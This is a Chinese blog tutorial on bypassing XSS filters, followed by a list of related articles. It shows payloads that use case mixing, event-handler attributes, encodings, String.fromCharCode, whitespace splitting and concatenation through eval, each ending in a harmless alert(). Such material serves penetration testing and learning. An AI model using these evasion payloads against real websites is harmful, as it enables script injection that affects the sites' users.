xss绕过方法

最新推荐文章于 2024-08-18 19:04:11 发布
最新推荐文章于 2024-08-18 19:04:11 发布
阅读量3.8k 收藏 16
点赞数 2
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinrier/article/details/113360496
版权

xss绕过方法

1.改变大小写

大小写穿插编写

<script>alert(“xss”);</script>

可以转换为:

<ScRipt>ALeRt(XSS);</sCRipT>

2.关闭标签

利用大于号>关闭标签使得xss生效

><script>alert(“Hi”);</script>

3.利用html标签触发事件

很多标签都可以对过滤进行绕过
格式:< 标签 事件 = 执行语句
例如:

<p onclick="alert('1')" style="postion:fixed;width:100%;heith:100%">&nbsp;</p>

<input onfocus="alert('1')" autofocus/>

<body onload="alert('xss')"></body>

<iframe src="./alert.html"></iframe>

<img onmouseover=”alert(‘xxs’)”>

参考资料

即使在攻击不需要任何标签属性的情况下,也应该尝试在标签名称之后添加一些多余的内容,因为这会绕过一些简单的过滤器.

4.编码绕过

过滤严格的函数可能也会将标签进行严格控制,但是如果用其他形式表示标签,脚本仍能解析却可以绕过过滤

常见的编码方式有:
HTML实体编码(&#ASCII) 参考资料
十进制、十六进制、八进制编码 编码器
unicode编码 编码器
escape编码 编码器
及下面将要讲到的String.fromCharCode(…)方法,如果使用eval执行10进制形式的脚本则需要配合string.fromcharcode()使用
eg1:
将下面语句进行hex编码

<script>alert(“xss”);</script>

上述语句hex编码后:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%E2%80%9C%78%73%73%E2%80%9D%29%3B%3C%2F%73%63%72%69%70%74%3E

eg2:

<img src="javascript&#116&#alert(/xss/);">

eg3:

<script>eval("\61\6c\65......");<script>

5.利用js中的String.fromCharCode绕过magic_quotes_gpc

我理解的magic_quotes_gpc=ON和addslashes()进行函数处理后得到的效果一样,比如就是将’转义成/‘,“转义成/”,开启了magic_quotes_gpc的网站会对我们编写的xss语句进行转义,从而使得语句失效,所以我们可以使用String.fromCharCode()方法避免magic_quotes_gpc对语句的转义。

String.fromCharCode()是javascript中的字符串方法,用来把ASCII转换为字符串。

String.fromCharCode()方法
利用此方法编码97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34,41后就是alert(“xss”)

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88,83, 83, 34, 41)</script>

6.使用默认SRC属性绕过SRC域名过滤器

此方法可绕过大部分SRC域名过滤器,它允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick。

<IMG SRC=# onmouseover=”alert(‘xxs’)”>

此处补充一些事件处理函数:

事件描述
onclick在用户使用鼠标左键点击对象时触发
ondblclick用户双击对象时触发
onmousedown用户用任何鼠标按键单击对象时触发
onmouseenter/onmouseover用户将鼠标指针移动到对象内时触发
onmouseleave/onmouseout用户将鼠标移出对象边界时触发
onmousemove用户将鼠标划过对象时触发
onmouseup用户在鼠标位于对象之上时释放鼠标按钮触发
onmousewheel鼠标滚轮按钮旋转时触发
onpaste用户粘贴数据以便从剪切板向文档传输数据在目标对象上时触发
onpropertychange在对象上发生对象属性更改时触发
onkeydown用户按下键盘按键时触发
onerror装载文档或图像的过程中发生错误时触发
onload加载完毕自动触发

7.空格/回车(换行符)/Tab

当过滤掉了Javascript等敏感字符串时就对字符串进行添加空格,换行或tab,此处利用js自身的性质:js通常用分号结尾,当解析到完整语句并且行尾存在换行符的情况下就可以忽略掉分号,若解析确定不是完整语句,则会继续处理,直到语句结束或出现分号。

例如下列语句,我们利用空格将语句分隔成了两部分,解析引擎解析确定到的不是完整的语句,JavaScript则会继续进行处理直到这个语句结束,利用换行符和tab同理。

<img src="java  script:alert(‘xss‘);" width=100>

或者

<img src="javascript:  alert(‘xss‘);" width=100>

8.拆分跨站法

拆分跨站就是像shellcode一样,遇到长度限制不能按正常方式跨站时,通过引入变量多次提交将之连接起来实现跨站。
例如:

< script>z=‘document.‘

< script>z=+‘write‘("‘

< script>z=z+‘<script‘

< script>eval(z)

另外除了像上面多次提交,也可以引用其他变量如:eval(qUserInfo.spaceName)形式,由于qUserInfo.spaceName是可控变量,因此改变其值就可以绕过长度限制

若有任何错误或理解上的偏差欢迎指正

T2cer
关注
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss绕过
Miracle_ze的博客
07-29 741
xss绕过
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
XSS三重URL编码绕过实例
04-11 1484
&#13; 遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:&#13; &#13; 双引号转义了,我们对双引号进行URL双重编码,再看一下输出:&#13; &#13; 依然被转义了,我们再加一层URL编码,即三重url编码,再看一下输出:&#13; &#13; URL编码被还原为双引号,并带入到html中输入。构造Payload实现弹窗&#13; &#13; ...
js html接口保存避免跨站脚本攻击(XSS)等安全问题,简单转义方法
weixin_50061268的博客
07-23 119
js html接口保存避免跨站脚本攻击(XSS)等安全问题,简单转义方法
XSS过滤绕过
qq_39654116的博客
01-17 5174
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 6127
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
XSS绕过技巧
weixin_52501704的博客
02-10 4742
XSS绕过技巧
XSS-过滤特殊符号的正则绕过
最新发布
ningwangh的博客
08-18 1156
所以将alert转化成30进制。
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
xss绕过字符过滤_XSS绕过实战练习
weixin_39640203的博客
12-21 730
前言写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。level1未进行过滤,直接输入payloadpayload:alert(/xss/)level2发现对html特殊符号进行了实体编码,失效,但是发现下面input标签里还有一个输出点,可...
记录几种XSS绕过方式1
08-03
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者...了解并防御这些XSS绕过方法对于网站安全至关重要,开发者应当定期更新和强化过滤规则,同时进行安全审计,确保网站对XSS攻击有足够的防护能力。
XSS绕过waf
m0_52813136的博客
07-28 1283
XSS绕过waf靶机
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 1591
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
xss绕过尖括号和双括号_XSS过关wp(未完待续,目前13)
weixin_42309456的博客
12-16 682
1.LEVEL 1审计源码:注意这几行:<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ,然后直接拼接echo所以给name直接传个最简单的xss弹窗即可:2.LEVEL...
浅谈XSS攻击的那些事(附常用绕过姿势)
06-15 389
前言 随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。 什么是XSS攻击 先上一段标准解释(摘自百度百科)。 “XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时
xss攻击突破转义_WEB安全之XSS攻击方式与防御方式
weixin_39520393的博客
11-21 877
上一期给大家简单介绍XSS以及其操作,本期将带大家了解XSS比较常见的攻击方式与防御方式,一起去了解一下~XSS 常见攻击方法1、绕过 XSS-Filter,利用 <> 标签注入 Html/JavaScript 代码;2、利用 HTML 标签的属性值进行 XSS 攻击。例如:<img src=“javascript:alert(‘xss’)”/>;(当然并不是所有的 Web...
XSS常见的绕过手法
热门推荐
Redredredfish的博客
12-07 1万+
XSS常见的绕过手法 大小写绕过 HTML对标签大小写不敏感,可以利用大小写混用绕过 例如:<script>改为<ScRiPt> 双写绕过 有些情况的规则会将黑名单标签替换为空,可以利用这一点构造标签 例如:<script>改为<scr<script>ipt> 同理某些注释符在规则中也会替换为空,这时候可以利用它构造payload 例如:<script>改为<scr<!---test--->ipt> 开口标签 在
json数据存入mysql中的text类型字段双引号转义成了&quot
09-09
在将JSON数据存入MySQL的TEXT类型字段时,双引号转义成了"\\"。这是因为MySQL默认使用反斜杠对特殊字符进行转义,以确保数据的完整性和一致性。 当我们将JSON数据以字符串形式插入到MySQL的TEXT字段中时,MySQL会自动将双引号转义为"\\""。这样做是为了避免与字符串本身的双引号混淆,确保数据的正确性。 当我们从MySQL中读取TEXT字段的JSON数据时,需要对转义后的双引号进行处理,恢复为原始的双引号。这可以通过在应用程序中进行字符串处理来实现。 例如,假设我们有一个包含JSON数据的TEXT字段,其中的双引号转义成了"\\",我们可以使用以下步骤来处理: 1. 从数据库中读取TEXT字段的数据。 2. 在应用程序中对读取的数据进行字符串处理。 3. 将"\\""替换为"\"",恢复为原始的双引号。 4. 现在我们可以使用解析器或库来解析处理过的JSON字符串,以得到原始的JSON对象。 需要注意的是,使用MySQL的JSON数据类型(JSON)可以更好地处理存储和查询JSON数据,而无需进行转义和额外的字符串处理。这种类型在MySQL 5.7.8及更高版本中可用,可以更方便地存储和操作JSON数据,而无需手动转义双引号
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值